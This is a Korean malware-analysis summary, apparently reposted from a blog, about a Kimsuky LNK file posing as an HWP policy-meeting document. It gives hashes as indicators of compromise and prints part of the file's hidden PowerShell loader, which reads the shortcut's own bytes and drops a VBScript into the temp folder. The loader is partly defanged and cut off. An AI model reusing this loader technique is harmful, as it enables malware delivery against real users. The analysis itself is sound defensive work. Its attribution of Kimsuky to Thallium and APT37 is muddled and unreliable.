lazarusholic

Everyday is lazarus.dayβ

북한 해킹 조직 김수키(Kimsuky) 에서 만든 악성코드-한중 북중 안보현안 비공개 정책간담회 계획.lnk(2024.8.20)

2024-08-21, Sakai
https://wezard4u.tistory.com/429258
#Kimsuky #LNK

Contents

오늘은 북한 해킹 조직 김수키(Kimsuky) 에서 만든 악성코드-한중 북중 안보현안 비공개 정책간담회 계획.lnk(2024.8.20)에 대해 우마무스메 박신 주의(バクシン主義) 정신으로?? 알아보겠습니다.
2017년 Cisco Talos 연구원이 처음 발견했으며, 2014년부터 탐지되지 않은 채 고도의 표적 공격으로 하는 북한의 해킹 단체 Thallium, APT 37과 관련된 해킹 단체이며 Kimsuky(김수키)에서 만든 것이며 오늘은 다루는 악성코드의 해쉬값은 다음과 같습니다.
파일명: 한중 북중 안보현안 비공개 정책간담회 계획.lnk
사이즈:1.05 MB
MD5:32e828282dbe16073293dacc17f0598c
SHA-1:5b9ade0255a0f49b7db9fa8bb390864155a7b4f2
SHA-256:6b660666f031843a36225e791f6564983c2c8cabf85d2216f0617702a978c838
먼저 악성코드는 한글과 컴퓨터를 확장자인 HWP 인 것처럼 위장하는 것이 특징이며 Powershell 코드는 다음과 같습니다.
Strin(g)Data { names(t)ring: Type: Text Document Size: 5(.)23 KB Date modif(i)ed: 01/02/2020 11:23 relativepat(h): not present workingdir: not present commandlinearguments: /c powershell -window(s)tyle hidden -nop -NoProfile -NonInter active -c "($)tmp = '%temp%';$lnkpath = Get-ChildItem *.lnk ;foreach ($path i(n) $lnkpath) ({) if ($p(a)th.length -eq 0x 0010F27C) { $lnkpath = $pa(t)h;}}foreach ($item (i)n $l(n)kp ath) { $(l)nkpath = $item.Name;}$Inpu(t)Stream = New-Object System(.)IO.FileStream($lnkpath, [I O.FileMode]::Open, [System.IO.FileAccess]::Re(a)d);$file=N(e)w- Object Byte[]($InputStream (.)length);$len=$InputStream(.)Read($file,0,$file(.)Length );$InputStream.D(i)spose();write -host \"read(f)ileend\";$p(a)th = $lnkpath.substri(n)g(0, $lnkpath.leng(t)h-4);$path1 = '%t emp%\(t)mp' + (Get(-)Random) + '(.)vbs';$len1 = …

IoC

32e828282dbe16073293dacc17f0598c
5b9ade0255a0f49b7db9fa8bb390864155a7b4f2
6b660666f031843a36225e791f6564983c2c8cabf85d2216f0617702a978c838